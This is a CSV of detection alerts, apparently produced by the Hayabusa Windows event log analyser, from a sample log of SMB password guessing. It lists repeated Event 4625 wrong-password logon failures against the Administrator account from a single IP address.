2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
